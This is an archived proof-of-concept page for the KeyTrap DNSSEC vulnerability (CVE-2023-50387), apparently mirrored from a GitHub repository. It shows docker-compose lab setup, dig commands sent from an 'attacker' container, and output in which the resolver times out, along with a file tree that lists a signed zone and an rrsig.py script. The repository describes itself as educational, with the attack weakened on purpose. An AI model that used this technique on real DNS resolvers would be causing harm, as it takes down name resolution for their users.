关联漏洞
标题:
Microsoft DNS Server 安全漏洞
(CVE-2023-50387)
描述:Microsoft DNS Server是美国微软(Microsoft)公司的一个服务。 Microsoft DNS Server存在安全漏洞。以下产品和版本受到影响:Windows Server 2019,Windows Server 2019 (Server Core installation),Windows Server 2022,Windows Server 2022 (Server Core installation),Windows Server 2022, 23H2 Edition (Se
描述
KeyTrap (DNS)
介绍
# CVE-2023-50387
KeyTrap in DNS (CVE-2023-50387)
This repository is for educational purposes.
The number of keys and signatures has been intentionally kept low to prevent their use in actual attacks, and a script for generating colliding keys are not included.
## Test
### Setting up the PoC environment
```
$ docker compose up --build
```
### Confirming DNSSEC works
```
$ docker compose exec -it attacker dig @10.10.0.3 a.a.test
; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 44249
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;a.a.test. IN A
;; ANSWER SECTION:
a.a.test. 86400 IN A 10.10.0.4
;; Query time: 30 msec
;; SERVER: 10.10.0.3#53(10.10.0.3) (UDP)
;; WHEN: Sun Feb 18 22:01:01 UTC 2024
;; MSG SIZE rcvd: 53
```
### Triggering KeyTrap
```sh
$ docker compose exec -it attacker dig @10.10.0.3 www.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
; <<>> DiG 9.18.24 <<>> @10.10.0.3 www.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
```
```sh
$ docker compose exec -it attacker dig @10.10.0.3 b.a.test
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
;; communications error to 10.10.0.3#53: timed out
; <<>> DiG 9.18.24 <<>> @10.10.0.3 a.a.test
; (1 server found)
;; global options: +cmd
;; no servers could be reached
```
## References
- https://www.athene-center.de/en/keytrap
文件快照
[4.0K] /data/pocs/04647e6ce060f27791aa9c4cceb3be59b91cf4b8
├── [4.0K] attacker
│ └── [ 55] Dockerfile
├── [4.0K] auth
│ ├── [2.4K] a.test.zone
│ ├── [8.6K] a.test.zone.signed
│ ├── [1.8K] Dockerfile
│ ├── [ 372] ksk.key
│ ├── [ 207] ksk.private
│ ├── [ 37] named
│ ├── [ 820] named.conf
│ ├── [ 372] zsk.key
│ └── [ 207] zsk.private
├── [ 750] docker-compose.yml
├── [4.0K] imgs
│ └── [ 40K] network.png
├── [1.0K] LICENSE
├── [ 15K] poetry.lock
├── [ 327] pyproject.toml
├── [1.8K] README.md
├── [4.0K] resolver
│ ├── [ 443] a.test.key
│ ├── [ 607] Dockerfile
│ └── [ 478] unbound.conf
└── [1.7K] rrsig.py
4 directories, 20 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。